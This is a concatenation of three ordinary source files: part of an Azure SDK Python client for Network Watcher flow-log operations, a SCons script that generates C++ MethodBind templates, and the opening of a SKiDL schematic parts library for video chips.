        # 200 (update) and 201 (create) both carry a FlowLog body.
        if response.status_code == 200:
            deserialized = self._deserialize('FlowLog', pipeline_response)
        if response.status_code == 201:
            deserialized = self._deserialize('FlowLog', pipeline_response)
        if cls:
            return cls(pipeline_response, deserialized, {})
        return deserialized
    _create_or_update_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkWatchers/{networkWatcherName}/flowLogs/{flowLogName}'}  # type: ignore
    def begin_create_or_update(
        self,
        resource_group_name,  # type: str
        network_watcher_name,  # type: str
        flow_log_name,  # type: str
        parameters,  # type: "_models.FlowLog"
        **kwargs  # type: Any
    ):
        # type: (...) -> LROPoller["_models.FlowLog"]
        """Create or update a flow log for the specified network security group.
        :param resource_group_name: The name of the resource group.
        :type resource_group_name: str
        :param network_watcher_name: The name of the network watcher.
        :type network_watcher_name: str
        :param flow_log_name: The name of the flow log.
        :type flow_log_name: str
        :param parameters: Parameters that define the create or update flow log resource.
        :type parameters: ~azure.mgmt.network.v2020_08_01.models.FlowLog
        :keyword callable cls: A custom type or function that will be passed the direct response
        :keyword str continuation_token: A continuation token to restart a poller from a saved state.
        :keyword polling: By default, your polling method will be ARMPolling.
         Pass in False for this operation to not poll, or pass in your own initialized polling object for a personal polling strategy.
        :paramtype polling: bool or ~azure.core.polling.PollingMethod
        :keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
        :return: An instance of LROPoller that returns either FlowLog or the result of cls(response)
        :rtype: ~azure.core.polling.LROPoller[~azure.mgmt.network.v2020_08_01.models.FlowLog]
        :raises ~azure.core.exceptions.HttpResponseError:
        """
        polling = kwargs.pop('polling', True)  # type: Union[bool, PollingMethod]
        cls = kwargs.pop('cls', None)  # type: ClsType["_models.FlowLog"]
        lro_delay = kwargs.pop(
            'polling_interval',
            self._config.polling_interval
        )
        cont_token = kwargs.pop('continuation_token', None)  # type: Optional[str]
        # A continuation token means we are resuming an LRO already in
        # flight, so the initial PUT is skipped.
        if cont_token is None:
            raw_result = self._create_or_update_initial(
                resource_group_name=resource_group_name,
                network_watcher_name=network_watcher_name,
                flow_log_name=flow_log_name,
                parameters=parameters,
                cls=lambda x,y,z: x,
                **kwargs
            )
        kwargs.pop('error_map', None)
        kwargs.pop('content_type', None)
        # Deserialization callback applied once the LRO reaches a terminal state.
        def get_long_running_output(pipeline_response):
            deserialized = self._deserialize('FlowLog', pipeline_response)
            if cls:
                return cls(pipeline_response, deserialized, {})
            return deserialized
        path_format_arguments = {
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
            'networkWatcherName': self._serialize.url("network_watcher_name", network_watcher_name, 'str'),
            'flowLogName': self._serialize.url("flow_log_name", flow_log_name, 'str'),
            'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
        }
        # Select the polling strategy: default ARM polling, no polling, or a
        # caller-supplied PollingMethod.
        if polling is True: polling_method = ARMPolling(lro_delay, lro_options={'final-state-via': 'azure-async-operation'}, path_format_arguments=path_format_arguments, **kwargs)
        elif polling is False: polling_method = NoPolling()
        else: polling_method = polling
        if cont_token:
            return LROPoller.from_continuation_token(
                polling_method=polling_method,
                continuation_token=cont_token,
                client=self._client,
                deserialization_callback=get_long_running_output
            )
        else:
            return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
    begin_create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkWatchers/{networkWatcherName}/flowLogs/{flowLogName}'}  # type: ignore
def update_tags(
    self,
    resource_group_name,  # type: str
    network_watcher_name,  # type: str
    flow_log_name,  # type: str
    parameters,  # type: "_models.TagsObject"
    **kwargs  # type: Any
):
    # type: (...) -> "_models.FlowLog"
    """Update tags of the specified flow log.

    Issues a synchronous ``PATCH`` against the flow-log resource and
    deserializes the 200 response into a ``FlowLog`` model.

    :param resource_group_name: The name of the resource group.
    :type resource_group_name: str
    :param network_watcher_name: The name of the network watcher.
    :type network_watcher_name: str
    :param flow_log_name: The name of the flow log.
    :type flow_log_name: str
    :param parameters: Parameters supplied to update flow log tags.
    :type parameters: ~azure.mgmt.network.v2020_08_01.models.TagsObject
    :keyword callable cls: A custom type or function that will be passed the direct response
    :return: FlowLog, or the result of cls(response)
    :rtype: ~azure.mgmt.network.v2020_08_01.models.FlowLog
    :raises: ~azure.core.exceptions.HttpResponseError
    """
    cls = kwargs.pop('cls', None)  # type: ClsType["_models.FlowLog"]
    # Map well-known failure codes to typed exceptions; callers may extend
    # or override the mapping via the 'error_map' keyword argument.
    error_map = {
        401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
    }
    error_map.update(kwargs.pop('error_map', {}))
    api_version = "2020-08-01"
    content_type = kwargs.pop("content_type", "application/json")
    accept = "application/json"
    # Construct URL from the operation's metadata template.
    url = self.update_tags.metadata['url']  # type: ignore
    path_format_arguments = {
        'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
        'networkWatcherName': self._serialize.url("network_watcher_name", network_watcher_name, 'str'),
        'flowLogName': self._serialize.url("flow_log_name", flow_log_name, 'str'),
        'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
    }
    url = self._client.format_url(url, **path_format_arguments)
    # Construct query parameters.
    query_parameters = {}  # type: Dict[str, Any]
    query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
    # Construct headers.
    header_parameters = {}  # type: Dict[str, Any]
    header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
    header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
    # Serialize the request body and run the PATCH through the pipeline.
    body_content_kwargs = {}  # type: Dict[str, Any]
    body_content = self._serialize.body(parameters, 'TagsObject')
    body_content_kwargs['content'] = body_content
    request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs)
    pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
    response = pipeline_response.http_response
    # Anything other than 200 is an error; map_error raises for mapped
    # codes, the fallback below raises for everything else.
    if response.status_code not in [200]:
        map_error(status_code=response.status_code, response=response, error_map=error_map)
        error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, response)
        raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
    deserialized = self._deserialize('FlowLog', pipeline_response)
    if cls:
        return cls(pipeline_response, deserialized, {})
    return deserialized
update_tags.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkWatchers/{networkWatcherName}/flowLogs/{flowLogName}'}  # type: ignore
def get(
    self,
    resource_group_name,  # type: str
    network_watcher_name,  # type: str
    flow_log_name,  # type: str
    **kwargs  # type: Any
):
    # type: (...) -> "_models.FlowLog"
    """Gets a flow log resource by name.

    Performs a synchronous ``GET`` and deserializes the 200 response into
    a ``FlowLog`` model.

    :param resource_group_name: The name of the resource group.
    :type resource_group_name: str
    :param network_watcher_name: The name of the network watcher.
    :type network_watcher_name: str
    :param flow_log_name: The name of the flow log resource.
    :type flow_log_name: str
    :keyword callable cls: A custom type or function that will be passed the direct response
    :return: FlowLog, or the result of cls(response)
    :rtype: ~azure.mgmt.network.v2020_08_01.models.FlowLog
    :raises: ~azure.core.exceptions.HttpResponseError
    """
    cls = kwargs.pop('cls', None)  # type: ClsType["_models.FlowLog"]
    # Map well-known failure codes to typed exceptions; extendable via
    # the 'error_map' keyword argument.
    error_map = {
        401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
    }
    error_map.update(kwargs.pop('error_map', {}))
    api_version = "2020-08-01"
    accept = "application/json"
    # Construct URL from the operation's metadata template.
    url = self.get.metadata['url']  # type: ignore
    path_format_arguments = {
        'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
        'networkWatcherName': self._serialize.url("network_watcher_name", network_watcher_name, 'str'),
        'flowLogName': self._serialize.url("flow_log_name", flow_log_name, 'str'),
        'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
    }
    url = self._client.format_url(url, **path_format_arguments)
    # Construct query parameters.
    query_parameters = {}  # type: Dict[str, Any]
    query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
    # Construct headers.
    header_parameters = {}  # type: Dict[str, Any]
    header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
    request = self._client.get(url, query_parameters, header_parameters)
    pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
    response = pipeline_response.http_response
    # Only 200 is a success for this operation.
    if response.status_code not in [200]:
        map_error(status_code=response.status_code, response=response, error_map=error_map)
        error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, response)
        raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
    deserialized = self._deserialize('FlowLog', pipeline_response)
    if cls:
        return cls(pipeline_response, deserialized, {})
    return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkWatchers/{networkWatcherName}/flowLogs/{flowLogName}'}  # type: ignore
def _delete_initial(
    self,
    resource_group_name,  # type: str
    network_watcher_name,  # type: str
    flow_log_name,  # type: str
    **kwargs  # type: Any
):
    # type: (...) -> None
    """Issue the initial DELETE request for the long-running delete operation.

    Private helper used by :meth:`begin_delete`; accepts 202 (accepted,
    polling required) and 204 (already gone) as success and returns nothing.
    """
    cls = kwargs.pop('cls', None)  # type: ClsType[None]
    # Map well-known failure codes to typed exceptions; extendable via
    # the 'error_map' keyword argument.
    error_map = {
        401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
    }
    error_map.update(kwargs.pop('error_map', {}))
    api_version = "2020-08-01"
    accept = "application/json"
    # Construct URL from the operation's metadata template.
    url = self._delete_initial.metadata['url']  # type: ignore
    path_format_arguments = {
        'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
        'networkWatcherName': self._serialize.url("network_watcher_name", network_watcher_name, 'str'),
        'flowLogName': self._serialize.url("flow_log_name", flow_log_name, 'str'),
        'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
    }
    url = self._client.format_url(url, **path_format_arguments)
    # Construct query parameters.
    query_parameters = {}  # type: Dict[str, Any]
    query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
    # Construct headers.
    header_parameters = {}  # type: Dict[str, Any]
    header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
    request = self._client.delete(url, query_parameters, header_parameters)
    pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
    response = pipeline_response.http_response
    # 202 = deletion accepted (async), 204 = no content; anything else fails.
    if response.status_code not in [202, 204]:
        map_error(status_code=response.status_code, response=response, error_map=error_map)
        error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, response)
        raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
    if cls:
        return cls(pipeline_response, None, {})
_delete_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkWatchers/{networkWatcherName}/flowLogs/{flowLogName}'}  # type: ignore
def begin_delete(
    self,
    resource_group_name,  # type: str
    network_watcher_name,  # type: str
    flow_log_name,  # type: str
    **kwargs  # type: Any
):
    # type: (...) -> LROPoller[None]
    """Deletes the specified flow log resource.

    Starts (or resumes, when ``continuation_token`` is supplied) a
    long-running delete and returns a poller for it.

    :param resource_group_name: The name of the resource group.
    :type resource_group_name: str
    :param network_watcher_name: The name of the network watcher.
    :type network_watcher_name: str
    :param flow_log_name: The name of the flow log resource.
    :type flow_log_name: str
    :keyword callable cls: A custom type or function that will be passed the direct response
    :keyword str continuation_token: A continuation token to restart a poller from a saved state.
    :keyword polling: By default, your polling method will be ARMPolling.
     Pass in False for this operation to not poll, or pass in your own initialized polling object for a personal polling strategy.
    :paramtype polling: bool or ~azure.core.polling.PollingMethod
    :keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
    :return: An instance of LROPoller that returns either None or the result of cls(response)
    :rtype: ~azure.core.polling.LROPoller[None]
    :raises ~azure.core.exceptions.HttpResponseError:
    """
    polling = kwargs.pop('polling', True)  # type: Union[bool, PollingMethod]
    cls = kwargs.pop('cls', None)  # type: ClsType[None]
    lro_delay = kwargs.pop(
        'polling_interval',
        self._config.polling_interval
    )
    cont_token = kwargs.pop('continuation_token', None)  # type: Optional[str]
    # Only issue the initial DELETE when not resuming from a saved poller
    # state; the cls lambda preserves the raw pipeline response for the poller.
    if cont_token is None:
        raw_result = self._delete_initial(
            resource_group_name=resource_group_name,
            network_watcher_name=network_watcher_name,
            flow_log_name=flow_log_name,
            cls=lambda x,y,z: x,
            **kwargs
        )
    # These kwargs were consumed by the initial request and must not leak
    # into the polling method constructed below.
    kwargs.pop('error_map', None)
    kwargs.pop('content_type', None)
    def get_long_running_output(pipeline_response):
        # Delete has no body to deserialize; only honor a custom cls hook.
        if cls:
            return cls(pipeline_response, None, {})
    path_format_arguments = {
        'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
        'networkWatcherName': self._serialize.url("network_watcher_name", network_watcher_name, 'str'),
        'flowLogName': self._serialize.url("flow_log_name", flow_log_name, 'str'),
        'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
    }
    # polling may be True (default ARM polling, final state via the
    # Location header), False (no polling), or a custom PollingMethod.
    if polling is True: polling_method = ARMPolling(lro_delay, lro_options={'final-state-via': 'location'}, path_format_arguments=path_format_arguments, **kwargs)
    elif polling is False: polling_method = NoPolling()
    else: polling_method = polling
    if cont_token:
        # Resume an earlier operation from its serialized poller state.
        return LROPoller.from_continuation_token(
            polling_method=polling_method,
            continuation_token=cont_token,
            client=self._client,
            deserialization_callback=get_long_running_output
        )
    else:
        return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkWatchers/{networkWatcherName}/flowLogs/{flowLogName}'}  # type: ignore
def list(
    self,
    resource_group_name,  # type: str
    network_watcher_name,  # type: str
    **kwargs  # type: Any
):
    # type: (...) -> Iterable["_models.FlowLogListResult"]
    """Lists all flow log resources for the specified Network Watcher.

    Returns a lazy pager; each page is fetched on demand and pagination
    follows the service-provided ``next_link``.

    :param resource_group_name: The name of the resource group containing Network Watcher.
    :type resource_group_name: str
    :param network_watcher_name: The name of the Network Watcher resource.
    :type network_watcher_name: str
    :keyword callable cls: A custom type or function that will be passed the direct response
    :return: An iterator like instance of either FlowLogListResult or the result of cls(response)
    :rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.network.v2020_08_01.models.FlowLogListResult]
    :raises: ~azure.core.exceptions.HttpResponseError
    """
    cls = kwargs.pop('cls', None)  # type: ClsType["_models.FlowLogListResult"]
    # Map well-known failure codes to typed exceptions; extendable via
    # the 'error_map' keyword argument.
    error_map = {
        401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
    }
    error_map.update(kwargs.pop('error_map', {}))
    api_version = "2020-08-01"
    accept = "application/json"
    def prepare_request(next_link=None):
        # Build either the first-page request (from the metadata URL
        # template) or a follow-up request to the absolute next_link.
        # Construct headers
        header_parameters = {}  # type: Dict[str, Any]
        header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
        if not next_link:
            # Construct URL
            url = self.list.metadata['url']  # type: ignore
            path_format_arguments = {
                'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
                'networkWatcherName': self._serialize.url("network_watcher_name", network_watcher_name, 'str'),
                'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
            }
            url = self._client.format_url(url, **path_format_arguments)
            # Construct parameters
            query_parameters = {}  # type: Dict[str, Any]
            query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
            request = self._client.get(url, query_parameters, header_parameters)
        else:
            # next_link already embeds every query parameter it needs.
            url = next_link
            query_parameters = {}  # type: Dict[str, Any]
            request = self._client.get(url, query_parameters, header_parameters)
        return request
    def extract_data(pipeline_response):
        # Turn one page response into (next_link, iterator of items).
        deserialized = self._deserialize('FlowLogListResult', pipeline_response)
        list_of_elem = deserialized.value
        if cls:
            list_of_elem = cls(list_of_elem)
        return deserialized.next_link or None, iter(list_of_elem)
    def get_next(next_link=None):
        # Fetch a single page, raising a typed error on non-200 responses.
        request = prepare_request(next_link)
        pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response
        if response.status_code not in [200]:
            error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, response)
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
        return pipeline_response
    return ItemPaged(
        get_next, extract_data
    )
list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkWatchers/{networkWatcherName}/flowLogs'}  # type: ignore
| |
# -*- coding: ibm850 -*-
# C++ source template for the typed MethodBind variants (TYPED_METHOD_BIND).
# Tokens of the form $cmd$ / $cmd data$ are expanded by make_version();
# '@' inside repeated sections is replaced by the argument index.
template_typed = """
#ifdef TYPED_METHOD_BIND
template<class T $ifret ,class R$ $ifargs ,$ $arg, class P@$>
class MethodBind$argc$$ifret R$$ifconst C$ : public MethodBind {
public:
$ifret R$ $ifnoret void$ (T::*method)($arg, P@$) $ifconst const$;
#ifdef DEBUG_METHODS_ENABLED
virtual Variant::Type _gen_argument_type(int p_arg) const { return _get_argument_type(p_arg); }
Variant::Type _get_argument_type(int p_argument) const {
$ifret if (p_argument==-1) return (Variant::Type)GetTypeInfo<R>::VARIANT_TYPE;$
$arg if (p_argument==(@-1)) return (Variant::Type)GetTypeInfo<P@>::VARIANT_TYPE;
$
return Variant::NIL;
}
virtual PropertyInfo _gen_argument_type_info(int p_argument) const {
$ifret if (p_argument==-1) return GetTypeInfo<R>::get_class_info();$
$arg if (p_argument==(@-1)) return GetTypeInfo<P@>::get_class_info();
$
return PropertyInfo();
}
#endif
virtual String get_instance_class() const {
return T::get_class_static();
}
virtual Variant call(Object* p_object,const Variant** p_args,int p_arg_count, Variant::CallError& r_error) {
T *instance=Object::cast_to<T>(p_object);
r_error.error=Variant::CallError::CALL_OK;
#ifdef DEBUG_METHODS_ENABLED
ERR_FAIL_COND_V(!instance,Variant());
if (p_arg_count>get_argument_count()) {
r_error.error=Variant::CallError::CALL_ERROR_TOO_MANY_ARGUMENTS;
r_error.argument=get_argument_count();
return Variant();
}
if (p_arg_count<(get_argument_count()-get_default_argument_count())) {
r_error.error=Variant::CallError::CALL_ERROR_TOO_FEW_ARGUMENTS;
r_error.argument=get_argument_count()-get_default_argument_count();
return Variant();
}
$arg CHECK_ARG(@);
$
#endif
$ifret Variant ret = $(instance->*method)($arg, _VC(@)$);
$ifret return Variant(ret);$
$ifnoret return Variant();$
}
#ifdef PTRCALL_ENABLED
virtual void ptrcall(Object*p_object,const void** p_args,void *r_ret) {
T *instance=Object::cast_to<T>(p_object);
$ifret PtrToArg<R>::encode( $ (instance->*method)($arg, PtrToArg<P@>::convert(p_args[@-1])$) $ifret ,r_ret)$ ;
}
#endif
MethodBind$argc$$ifret R$$ifconst C$ () {
#ifdef DEBUG_METHODS_ENABLED
_set_const($ifconst true$$ifnoconst false$);
_generate_argument_types($argc$);
#else
set_argument_count($argc$);
#endif
$ifret _set_returns(true); $
};
};
template<class T $ifret ,class R$ $ifargs ,$ $arg, class P@$>
MethodBind* create_method_bind($ifret R$ $ifnoret void$ (T::*p_method)($arg, P@$) $ifconst const$ ) {
MethodBind$argc$$ifret R$$ifconst C$<T $ifret ,R$ $ifargs ,$ $arg, P@$> * a = memnew( (MethodBind$argc$$ifret R$$ifconst C$<T $ifret ,R$ $ifargs ,$ $arg, P@$>) );
a->method=p_method;
return a;
}
#endif
"""
# C++ source template for the untyped MethodBind variants (the
# !TYPED_METHOD_BIND path): the member-function pointer is smuggled
# through a union onto a dummy __UnexistingClass so one instantiation
# serves every class.  Same $macro$ conventions as template_typed.
template = """
#ifndef TYPED_METHOD_BIND
$iftempl template<$ $ifret class R$ $ifretargs ,$ $arg, class P@$ $iftempl >$
class MethodBind$argc$$ifret R$$ifconst C$ : public MethodBind {
public:
StringName type_name;
$ifret R$ $ifnoret void$ (__UnexistingClass::*method)($arg, P@$) $ifconst const$;
#ifdef DEBUG_METHODS_ENABLED
virtual Variant::Type _gen_argument_type(int p_arg) const { return _get_argument_type(p_arg); }
Variant::Type _get_argument_type(int p_argument) const {
$ifret if (p_argument==-1) return (Variant::Type)GetTypeInfo<R>::VARIANT_TYPE;$
$arg if (p_argument==(@-1)) return (Variant::Type)GetTypeInfo<P@>::VARIANT_TYPE;
$
return Variant::NIL;
}
virtual PropertyInfo _gen_argument_type_info(int p_argument) const {
$ifret if (p_argument==-1) return GetTypeInfo<R>::get_class_info();$
$arg if (p_argument==(@-1)) return GetTypeInfo<P@>::get_class_info();
$
return PropertyInfo();
}
#endif
virtual String get_instance_class() const {
return type_name;
}
virtual Variant call(Object* p_object,const Variant** p_args,int p_arg_count, Variant::CallError& r_error) {
__UnexistingClass *instance = (__UnexistingClass*)p_object;
r_error.error=Variant::CallError::CALL_OK;
#ifdef DEBUG_METHODS_ENABLED
ERR_FAIL_COND_V(!instance,Variant());
if (p_arg_count>get_argument_count()) {
r_error.error=Variant::CallError::CALL_ERROR_TOO_MANY_ARGUMENTS;
r_error.argument=get_argument_count();
return Variant();
}
if (p_arg_count<(get_argument_count()-get_default_argument_count())) {
r_error.error=Variant::CallError::CALL_ERROR_TOO_FEW_ARGUMENTS;
r_error.argument=get_argument_count()-get_default_argument_count();
return Variant();
}
$arg CHECK_ARG(@);
$
#endif
$ifret Variant ret = $(instance->*method)($arg, _VC(@)$);
$ifret return Variant(ret);$
$ifnoret return Variant();$
}
#ifdef PTRCALL_ENABLED
virtual void ptrcall(Object*p_object,const void** p_args,void *r_ret) {
__UnexistingClass *instance = (__UnexistingClass*)p_object;
$ifret PtrToArg<R>::encode( $ (instance->*method)($arg, PtrToArg<P@>::convert(p_args[@-1])$) $ifret ,r_ret) $ ;
}
#endif
MethodBind$argc$$ifret R$$ifconst C$ () {
#ifdef DEBUG_METHODS_ENABLED
_set_const($ifconst true$$ifnoconst false$);
_generate_argument_types($argc$);
#else
set_argument_count($argc$);
#endif
$ifret _set_returns(true); $
};
};
template<class T $ifret ,class R$ $ifargs ,$ $arg, class P@$>
MethodBind* create_method_bind($ifret R$ $ifnoret void$ (T::*p_method)($arg, P@$) $ifconst const$ ) {
MethodBind$argc$$ifret R$$ifconst C$ $iftempl <$ $ifret R$ $ifretargs ,$ $arg, P@$ $iftempl >$ * a = memnew( (MethodBind$argc$$ifret R$$ifconst C$ $iftempl <$ $ifret R$ $ifretargs ,$ $arg, P@$ $iftempl >$) );
union {
$ifret R$ $ifnoret void$ (T::*sm)($arg, P@$) $ifconst const$;
$ifret R$ $ifnoret void$ (__UnexistingClass::*dm)($arg, P@$) $ifconst const$;
} u;
u.sm=p_method;
a->method=u.dm;
a->type_name=T::get_class_static();
return a;
}
#endif
"""
def make_version(template, nargs, argmax, const, ret):
    """Expand a ``$macro$`` template into C++ source for one bind variant.

    Macros are delimited by a pair of ``$`` characters and take the form
    ``$cmd$`` or ``$cmd data$``.  Supported commands:

    * ``argc`` -- emit the argument count ``nargs``.
    * ``ifret`` / ``ifnoret`` -- emit ``data`` when the method does / does
      not return a value.
    * ``ifargs`` / ``ifretargs`` -- emit ``data`` when there are arguments /
      both arguments and a return value.
    * ``ifconst`` / ``ifnoconst`` -- emit ``data`` when the method is /
      is not const-qualified.
    * ``iftempl`` -- emit ``data`` when a template header is needed
      (arguments or a return value exist).
    * ``arg,`` / ``arg`` -- repeat ``data`` once per argument index
      1..nargs (with / without a ", " separator), substituting ``@`` with
      the index.
    * ``noarg`` -- repeat ``data`` for the unused indices nargs+1..argmax.

    :param template: Template text to expand.
    :param nargs: Number of method arguments in this variant.
    :param argmax: Maximum supported argument count (used by ``noarg``).
    :param const: Whether the bound method is const-qualified.
    :param ret: Whether the bound method returns a value.
    :return: The expanded C++ source as a string.
    """
    intext = template
    from_pos = 0
    outtext = ""

    while True:
        to_pos = intext.find("$", from_pos)
        if to_pos == -1:
            # No more macros: flush the remaining text verbatim.
            outtext += intext[from_pos:]
            break
        outtext += intext[from_pos:to_pos]
        end = intext.find("$", to_pos + 1)
        if end == -1:
            break  # Unterminated macro: silently drop the remainder.
        macro = intext[to_pos + 1:end]
        # Split "cmd data"; data itself may contain further spaces.
        cmd = ""
        data = ""
        if macro.find(" ") != -1:
            cmd = macro[0:macro.find(" ")]
            data = macro[macro.find(" ") + 1:]
        else:
            cmd = macro

        if cmd == "argc":
            outtext += str(nargs)
        if cmd == "ifret" and ret:
            outtext += data
        if cmd == "ifargs" and nargs:
            outtext += data
        if cmd == "ifretargs" and nargs and ret:
            outtext += data
        if cmd == "ifconst" and const:
            outtext += data
        elif cmd == "ifnoconst" and not const:
            outtext += data
        elif cmd == "ifnoret" and not ret:
            outtext += data
        elif cmd == "iftempl" and (nargs > 0 or ret):
            outtext += data
        elif cmd == "arg,":
            # Comma-separated per-argument expansion, e.g. "P1, P2, P3".
            for i in range(1, nargs + 1):
                if i > 1:
                    outtext += ", "
                outtext += data.replace("@", str(i))
        elif cmd == "arg":
            # Plain per-argument expansion, no separator.
            for i in range(1, nargs + 1):
                outtext += data.replace("@", str(i))
        elif cmd == "noarg":
            # Expansion for the argument slots NOT used by this variant.
            # (The original had this branch duplicated verbatim; the second
            # copy was unreachable dead code and has been removed.)
            for i in range(nargs + 1, argmax + 1):
                outtext += data.replace("@", str(i))
        from_pos = end + 1
    return outtext
def run(target, source, env):
    """SCons build action: generate the method-bind header files.

    Expands every (argument-count, const, return) combination of both the
    untyped and the typed template.  Variants with fewer than
    ``versions_ext`` arguments are written to ``target[0]``, the larger
    ("extended") variants to ``target[1]``.
    """
    versions = 13
    versions_ext = 6
    text = ""
    text_ext = ""

    for nargs in range(versions + 1):
        chunk = ""
        # Emit the untyped and typed bind for each (const, ret) combination,
        # in the same order the build has always produced them.
        for is_const in (False, True):
            for has_ret in (False, True):
                chunk += make_version(template, nargs, versions, is_const, has_ret)
                chunk += make_version(template_typed, nargs, versions, is_const, has_ret)
        if nargs >= versions_ext:
            text_ext += chunk
        else:
            text += chunk

    with open(target[0], "w") as f:
        f.write(text)
    with open(target[1], "w") as f:
        f.write(text_ext)
# Allow SCons to invoke this generator as a standalone subprocess.
if __name__ == '__main__':
    from platform_methods import subprocess_main
    subprocess_main(globals())
| |
from skidl import SKIDL, TEMPLATE, Part, Pin, SchLib
# Auto-generated SKiDL schematic library of video-related parts
# (RGB/NTSC encoders, CCD signal processors, vertical clock drivers,
# CCD image sensors, sync separators, teletext/OSD chips, ...).
# NOTE(review): generated data -- regenerate rather than hand-editing.
SKIDL_lib_version = '0.0.1'
video = SchLib(tool=SKIDL).add_parts(*[
        Part(name='AD725',dest=TEMPLATE,tool=SKIDL,keywords='Video',description='Low Cost RGB to NTSC/PAL Encoder with Luma Trap Port',ref_prefix='U',num_units=1,fplist=['SOIC*7.5x10.3mm*Pitch1.27mm*'],do_erc=True,pins=[
            Pin(num='1',name='NTSC/PAL',do_erc=True),
            Pin(num='2',name='AGND',func=Pin.PWRIN,do_erc=True),
            Pin(num='3',name='4FSC_CLK',do_erc=True),
            Pin(num='4',name='AVCC',func=Pin.PWRIN,do_erc=True),
            Pin(num='5',name='CE',func=Pin.PWRIN,do_erc=True),
            Pin(num='6',name='RED',do_erc=True),
            Pin(num='7',name='GREEN',do_erc=True),
            Pin(num='8',name='BLUE',do_erc=True),
            Pin(num='9',name='CHROM_OUT',func=Pin.OUTPUT,do_erc=True),
            Pin(num='10',name='CVBS_OUT',func=Pin.OUTPUT,do_erc=True),
            Pin(num='11',name='LUM_OUT',func=Pin.OUTPUT,do_erc=True),
            Pin(num='12',name='TRAP',do_erc=True),
            Pin(num='13',name='DGND',func=Pin.PWRIN,do_erc=True),
            Pin(num='14',name='DVCC',func=Pin.PWRIN,do_erc=True),
            Pin(num='15',name='VSYNC',do_erc=True),
            Pin(num='16',name='HSYNC',do_erc=True)]),
        Part(name='AD9891',dest=TEMPLATE,tool=SKIDL,keywords='CCD Signal Processor',description='CCD Signal Processor, 20MHz 10bits, CSPBGA-64',ref_prefix='U',num_units=1,fplist=['BGA*10x10*9.0x9.0mm*Pitch0.8mm*'],do_erc=True,pins=[
            Pin(num='A1',name='VD',func=Pin.BIDIR,do_erc=True),
            Pin(num='B1',name='HD',func=Pin.BIDIR,do_erc=True),
            Pin(num='C1',name='SYNC',do_erc=True),
            Pin(num='D1',name='DCLK',func=Pin.OUTPUT,do_erc=True),
            Pin(num='F1',name='D1',func=Pin.OUTPUT,do_erc=True),
            Pin(num='G1',name='D3',func=Pin.OUTPUT,do_erc=True),
            Pin(num='H1',name='D5',func=Pin.OUTPUT,do_erc=True),
            Pin(num='J1',name='D7',func=Pin.OUTPUT,do_erc=True),
            Pin(num='K1',name='D9',do_erc=True),
            Pin(num='A2',name='DVDD',func=Pin.PWRIN,do_erc=True),
            Pin(num='B2',name='DVSS',func=Pin.PWRIN,do_erc=True),
            Pin(num='C2',name='LD/FD',func=Pin.OUTPUT,do_erc=True),
            Pin(num='D2',name='PBLK/CLPOB',func=Pin.OUTPUT,do_erc=True),
            Pin(num='F2',name='D0/SD0',func=Pin.OUTPUT,do_erc=True),
            Pin(num='G2',name='D2',func=Pin.OUTPUT,do_erc=True),
            Pin(num='H2',name='D4',func=Pin.OUTPUT,do_erc=True),
